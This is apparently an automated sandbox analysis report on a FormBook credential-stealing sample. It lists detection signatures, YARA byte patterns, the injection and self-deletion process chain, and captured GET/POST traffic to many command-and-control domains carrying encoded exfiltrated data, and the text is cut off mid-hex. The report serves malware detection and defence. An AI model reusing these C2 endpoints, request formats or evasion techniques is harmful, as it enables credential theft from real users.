Loading ...

Play interactive tourEdit tour

Analysis Report itres.bin

Overview

General Information

Sample Name:itres.bin (renamed file extension from bin to exe)
Analysis ID:287347
MD5:f028d6c9991258c5c75e9f234d4dee79
SHA1:2f6b7f76bb4a3342f3450e1cc9ef539c2028c59e
SHA256:576f0ed5ae69ececc1bb11492479101c0281af46cb86a73eae9195376ab02717

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • itres.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\itres.exe' MD5: F028D6C9991258C5C75E9F234D4DEE79)
    • itres.exe (PID: 4468 cmdline: C:\Users\user\Desktop\itres.exe MD5: F028D6C9991258C5C75E9F234D4DEE79)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 6068 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 3352 cmdline: /c del 'C:\Users\user\Desktop\itres.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
    • 0x160ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16008:$sqlite3text: 68 38 2A 90 C5
    • 0x1612d:$sqlite3text: 68 38 2A 90 C5
    • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.itres.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.itres.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.itres.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x153d9:$sqlite3step: 68 34 1C 7B E1
        • 0x154ec:$sqlite3step: 68 34 1C 7B E1
        • 0x15408:$sqlite3text: 68 38 2A 90 C5
        • 0x1552d:$sqlite3text: 68 38 2A 90 C5
        • 0x1541b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15543:$sqlite3blob: 68 53 D8 7F 8C
        1.2.itres.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.itres.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: itres.exeVirustotal: Detection: 56%Perma Link
          Source: itres.exeReversingLabs: Detection: 58%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: itres.exeJoe Sandbox ML: detected
          Source: 1.2.itres.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E7F460 FindFirstFileW,FindNextFileW,FindClose,4_2_02E7F460
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E7F459 FindFirstFileW,FindNextFileW,FindClose,4_2_02E7F459
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E7F585 FindFirstFileW,FindNextFileW,FindClose,4_2_02E7F585
          Source: C:\Users\user\Desktop\itres.exeCode function: 4x nop then mov ecx, dword ptr [ebp-44h]0_2_00A5CA70
          Source: C:\Users\user\Desktop\itres.exeCode function: 4x nop then jmp 00A5DB82h0_2_00A5CF79
          Source: C:\Users\user\Desktop\itres.exeCode function: 4x nop then pop edi1_2_00415001
          Source: C:\Users\user\Desktop\itres.exeCode function: 4x nop then pop edi1_2_0040C119
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi4_2_02E85001
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi4_2_02E7C119

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49739
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49741
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49743
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49751
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49755
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.brasserie-lafayette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JajlTyMmOo22K&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=3ubZ5tRrxIfN41eqqpIj22VrlW9j75JM4xICI34kih2i+rqjsIMd825CVukfAvIDWxA7&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.smalltownlawns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjA0pYsAdDrMj&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.thebardi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=/wmggT2FDua6/uf0m8vYUW9XM6JdOK3pq1DkZ95mxMYTiU7Z21xlQY1juaca7pTz06oP&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.connerparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1HyKj92Df3q0&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.nola3d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=C15d5iwTKlKsI3rAXZsLwlTuGsAeQEM+ckQv/EOsC4DDktzSY592Fv+KLrtwSAQYGPi+&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.23works.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oWYtlCk9w&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFR/144BWYfki&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.clicrhonealpes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.99.40.222 209.99.40.222
          Source: Joe Sandbox ViewIP Address: 164.132.235.17 164.132.235.17
          Source: Joe Sandbox ViewIP Address: 164.132.235.17 164.132.235.17
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.isabellelinhnguyen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.isabellelinhnguyen.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 53 4a 57 39 79 63 68 50 49 70 71 57 39 54 43 4c 38 4a 68 72 73 4e 48 57 65 50 58 66 50 50 4b 63 56 75 57 36 28 4b 7a 58 4d 4e 66 58 35 75 54 64 4e 33 28 4c 56 5a 57 49 4a 51 46 44 31 66 44 65 7e 6d 47 64 77 41 4c 75 55 37 34 51 6b 46 56 70 56 4c 53 73 53 76 68 32 42 55 44 35 77 66 47 6e 4c 63 36 62 74 54 74 72 44 66 76 32 78 43 43 68 73 54 32 33 74 52 62 6a 72 42 28 6e 4c 46 6d 52 49 43 58 77 54 39 5a 78 66 34 47 4a 4e 57 30 47 4a 6b 77 39 41 48 48 73 74 62 59 35 65 58 4f 33 51 42 31 55 62 73 66 6f 76 34 30 74 62 5f 64 52 43 5a 4b 38 68 62 4b 32 6c 6a 28 2d 6e 44 71 35 47 73 4f 41 52 38 69 54 58 4d 6d 75 6f 51 52 7a 33 54 6f 4b 50 76 57 53 72 6c 5a 7a 42 52 79 76 55 55 79 30 68 52 4e 58 77 30 4f 4d 46 33 57 76 68 44 6c 6f 35 77 6e 61 55 56 62 71 43 6b 47 4a 6f 6d 39 56 4a 73 64 4a 6e 59 5a 53 49 70 42 6b 7a 43 58 48 47 49 67 64 37 45 79 57 33 51 75 4d 7e 6d 6d 50 4a 52 54 6f 4e 51 34 6e 4a 6c 6f 55 63 78 6d 7a 7a 65 55 48 37 56 6f 70 68 57 39 4a 74 45 6f 4e 62 76 46 4e 53 6a 56 6d 53 44 4c 38 75 38 61 73 6c 50 30 6d 6f 4c 45 69 65 45 49 75 62 54 78 42 49 71 41 77 64 53 34 49 43 50 48 53 58 43 44 34 53 52 74 6a 67 75 70 6e 64 59 78 7a 37 67 6f 56 4f 78 56 71 67 76 77 32 66 65 7a 6a 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=SJW9ychPIpqW9TCL8JhrsNHWePXfPPKcVuW6(KzXMNfX5uTdN3(LVZWIJQFD1fDe~mGdwALuU74QkFVpVLSsSvh2BUD5wfGnLc6btTtrDfv2xCChsT23tRbjrB(nLFmRICXwT9Zxf4GJNW0GJkw9AHHstbY5eXO3QB1Ubsfov40tb_dRCZK8hbK2lj(-nDq5GsOAR8iTXMmuoQRz3ToKPvWSrlZzBRyvUUy0hRNXw0OMF3WvhDlo5wnaUVbqCkGJom9VJsdJnYZSIpBkzCXHGIgd7EyW3QuM~mmPJRToNQ4nJloUcxmzzeUH7VophW9JtEoNbvFNSjVmSDL8u8aslP0moLEieEIubTxBIqAwdS4ICPHSXCD4SRtjgupndYxz7goVOxVqgvw2fezjxw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.smalltownlawns.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.smalltownlawns.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.smalltownlawns.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 34 73 76 6a 6e 49 63 65 39 71 48 6b 73 46 66 38 71 4f 31 56 6a 6d 39 53 73 31 55 77 74 71 64 58 39 55 70 42 4f 77 67 4c 75 43 36 33 77 34 6d 56 72 4b 56 7a 37 78 6c 47 58 66 73 6c 53 66 59 49 41 46 63 4a 30 6b 79 49 67 55 42 72 7a 58 78 50 47 58 51 59 31 74 65 75 63 45 30 62 68 74 4a 45 6c 54 75 42 65 61 7e 6d 61 67 31 5f 34 34 55 5a 4e 75 39 67 30 33 6c 36 59 6f 4e 4c 55 37 4b 39 35 30 38 30 66 72 72 4a 38 6b 64 55 6c 4b 33 65 52 66 5a 4a 76 50 28 79 28 59 70 4a 43 34 52 37 4a 75 63 47 53 6d 6c 6c 62 53 54 68 6a 67 7a 70 4c 34 6e 6d 4d 57 35 54 4e 4d 33 49 5a 73 6d 72 4e 50 6d 59 47 5f 33 6d 51 7a 6e 39 53 69 67 6f 31 37 43 4d 74 52 31 42 57 7a 4e 6f 42 46 6f 32 7a 77 4e 54 53 56 49 5a 55 76 48 6a 7e 50 6a 53 68 33 36 68 42 78 6b 73 49 61 6c 54 46 68 28 70 6e 4a 4e 73 66 73 75 7a 71 44 35 70 61 77 62 77 46 51 44 36 54 6f 6a 4e 57 44 37 52 32 71 31 4a 61 75 42 4f 31 69 78 4a 63 74 78 30 7a 5f 63 51 67 6a 63 39 76 46 37 5f 51 43 45 64 30 7a 7e 4b 46 2d 42 33 79 65 47 58 6b 38 70 52 62 42 43 71 51 65 46 75 7a 74 4b 74 6a 71 32 78 4f 41 6a 6e 6f 4b 42 55 44 4e 72 30 73 62 32 43 64 53 77 76 51 47 5a 4d 4a 67 49 31 58 65 46 42 50 43 74 32 36 5a 39 47 77 57 6e 33 54 31 6f 50 30 59 4d 42 7a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=4svjnIce9qHksFf8qO1Vjm9Ss1UwtqdX9UpBOwgLuC63w4mVrKVz7xlGXfslSfYIAFcJ0kyIgUBrzXxPGXQY1teucE0bhtJElTuBea~mag1_44UZNu9g03l6YoNLU7K95080frrJ8kdUlK3eRfZJvP(y(YpJC4R7JucGSmllbSThjgzpL4nmMW5TNM3IZsmrNPmYG_3mQzn9Sigo17CMtR1BWzNoBFo2zwNTSVIZUvHj~PjSh36hBxksIalTFh(pnJNsfsuzqD5pawbwFQD6TojNWD7R2q1JauBO1ixJctx0z_cQgjc9vF7_QCEd0z~KF-B3yeGXk8pRbBCqQeFuztKtjq2xOAjnoKBUDNr0sb2CdSwvQGZMJgI1XeFBPCt26Z9GwWn3T1oP0YMBzw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.thebardi.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.thebardi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thebardi.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 37 34 45 56 67 6f 70 65 48 77 6c 52 58 33 42 50 56 43 48 71 73 36 6d 72 44 41 52 30 41 79 51 6f 45 4c 77 34 46 4c 70 41 6b 5f 53 66 50 76 4d 75 56 72 44 6a 71 68 54 47 68 67 45 47 4c 4e 67 67 61 61 73 44 4c 4c 74 58 55 63 5a 35 6c 4f 55 36 36 74 56 39 74 5f 55 45 5a 6a 34 4d 66 48 59 5a 42 58 32 4d 42 5a 57 6a 46 6b 64 73 44 41 64 4a 42 71 35 73 50 32 50 70 49 72 38 76 42 78 42 76 31 57 6d 45 67 54 37 35 51 4d 45 62 30 35 59 39 35 47 68 6f 4b 45 50 4a 53 73 59 5f 70 4a 72 51 71 32 44 63 61 43 6f 39 6b 37 4c 36 4a 35 68 30 7a 77 46 63 50 74 38 6b 54 71 56 41 65 35 63 46 7e 73 48 44 32 6f 34 47 61 50 35 41 42 41 79 77 4c 42 4e 74 47 45 38 33 51 4e 6e 6a 49 46 47 39 65 31 46 46 50 76 71 54 4c 6e 45 77 74 49 61 35 28 75 28 46 61 42 49 79 62 72 68 57 31 6e 7a 44 33 51 6f 4f 79 38 38 37 78 33 37 49 65 64 46 61 53 58 4e 4d 4b 55 30 78 75 4f 54 47 75 50 72 4c 66 2d 41 6b 31 2d 49 32 48 73 59 32 68 65 73 4b 63 6d 6a 55 30 42 78 65 73 48 70 54 39 46 4f 71 44 45 32 42 30 46 48 32 30 75 56 67 75 45 4c 62 39 65 70 53 49 56 70 41 58 44 5a 5a 56 4c 44 44 42 36 4a 50 7e 6e 70 7a 48 77 74 70 4e 77 56 78 53 7a 65 77 66 7a 6b 66 56 69 4f 74 31 59 69 69 57 5f 43 53 4d 6c 44 42 44 52 6e 6b 6d 55 57 6a 75 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=74EVgopeHwlRX3BPVCHqs6mrDAR0AyQoELw4FLpAk_SfPvMuVrDjqhTGhgEGLNggaasDLLtXUcZ5lOU66tV9t_UEZj4MfHYZBX2MBZWjFkdsDAdJBq5sP2PpIr8vBxBv1WmEgT75QMEb05Y95GhoKEPJSsY_pJrQq2DcaCo9k7L6J5h0zwFcPt8kTqVAe5cF~sHD2o4GaP5ABAywLBNtGE83QNnjIFG9e1FFPvqTLnEwtIa5(u(FaBIybrhW1nzD3QoOy887x37IedFaSXNMKU0xuOTGuPrLf-Ak1-I2HsY2hesKcmjU0BxesHpT9FOqDE2B0FH20uVguELb9epSIVpAXDZZVLDDB6JP~npzHwtpNwVxSzewfzkfViOt1YiiW_CSMlDBDRnkmUWjuw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.connerparty.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.connerparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.connerparty.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 77 79 53 61 7e 33 61 74 46 63 7e 45 6f 38 69 4b 37 6f 69 6c 45 53 38 34 43 6f 49 4b 49 62 66 37 30 69 4b 52 42 76 35 37 79 4e 45 33 7a 6b 4c 52 6e 6e 34 43 44 75 6c 36 73 37 64 38 39 37 54 46 6e 38 6f 69 7a 78 44 51 6d 79 71 4f 68 75 45 6c 78 45 77 78 57 37 75 4b 59 51 73 30 57 32 78 6d 6b 56 38 68 4a 34 75 64 59 70 7e 6d 70 66 69 2d 4b 70 78 2d 46 4e 76 6b 51 71 49 58 6a 41 32 46 44 73 65 56 41 62 71 63 52 47 76 74 58 73 67 65 69 70 59 7a 36 32 42 78 63 59 65 62 72 6d 57 74 6c 6e 30 75 77 44 37 6c 4b 34 4e 6b 79 36 61 72 33 45 48 30 6b 59 48 56 61 68 4b 51 49 37 55 2d 45 33 38 52 4e 7a 44 47 4d 71 79 79 35 55 66 6c 6f 6b 4f 35 35 65 76 5f 73 46 75 38 32 53 33 36 52 47 4b 49 54 4b 6a 47 53 6e 44 6c 6e 6e 4b 76 71 57 61 72 75 51 49 73 4e 42 4d 6e 4f 75 65 35 7a 6a 47 37 51 53 7e 6f 4e 6c 36 47 6f 65 36 59 4a 44 35 77 44 4b 48 56 28 4b 4a 30 52 41 37 64 48 58 66 61 70 6b 77 35 37 46 49 67 4d 66 7a 4a 44 4b 31 33 33 6a 53 6a 38 52 48 36 50 7a 30 32 75 4e 4e 67 58 4f 7e 49 7e 36 44 55 76 69 6d 2d 6b 5f 36 71 76 41 4f 73 46 52 44 52 48 37 32 31 6e 37 58 4e 5a 36 51 72 38 58 5a 38 4a 75 47 75 47 5a 6c 51 75 50 64 35 6d 4a 59 49 76 7a 72 49 48 4f 35 6e 35 48 64 41 77 58 4a 42 72 42 36 37 44 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=wySa~3atFc~Eo8iK7oilES84CoIKIbf70iKRBv57yNE3zkLRnn4CDul6s7d897TFn8oizxDQmyqOhuElxEwxW7uKYQs0W2xmkV8hJ4udYp~mpfi-Kpx-FNvkQqIXjA2FDseVAbqcRGvtXsgeipYz62BxcYebrmWtln0uwD7lK4Nky6ar3EH0kYHVahKQI7U-E38RNzDGMqyy5UflokO55ev_sFu82S36RGKITKjGSnDlnnKvqWaruQIsNBMnOue5zjG7QS~oNl6Goe6YJD5wDKHV(KJ0RA7dHXfapkw57FIgMfzJDK133jSj8RH6Pz02uNNgXO~I~6DUvim-k_6qvAOsFRDRH721n7XNZ6Qr8XZ8JuGuGZlQuPd5mJYIvzrIHO5n5HdAwXJBrB67DA).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.nola3d.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.nola3d.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nola3d.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 49 50 5a 41 46 69 59 56 58 4d 58 4e 7a 4a 71 41 33 69 5a 42 73 38 4e 37 6e 39 38 58 4a 63 34 54 36 6b 41 6c 31 6b 76 76 73 37 75 56 62 77 78 62 6d 48 39 44 70 53 7e 58 76 52 66 70 77 5f 76 52 42 43 65 4c 4e 48 58 70 65 6d 36 46 62 79 71 64 59 2d 31 63 4c 79 6c 54 54 38 6b 37 77 71 78 4d 62 65 70 47 6d 38 54 41 35 79 6e 51 48 30 37 49 57 6b 42 4f 57 4b 6f 37 57 33 79 5a 6a 61 67 72 66 61 44 4c 6f 61 61 42 4b 51 74 33 7e 44 78 6a 55 66 42 63 54 36 71 54 44 6e 30 52 71 4d 55 35 6d 7a 66 64 4c 6b 6e 46 4f 6e 61 36 62 77 62 69 62 5a 6f 53 75 72 32 37 36 68 44 69 39 38 71 53 5a 56 74 52 77 73 54 64 6d 70 58 61 7a 51 6e 6b 6a 4c 68 43 6f 4c 31 36 4e 52 76 5f 69 47 42 65 30 64 38 2d 5a 66 36 4c 50 78 64 6a 4e 53 32 66 61 6f 71 6a 47 70 33 38 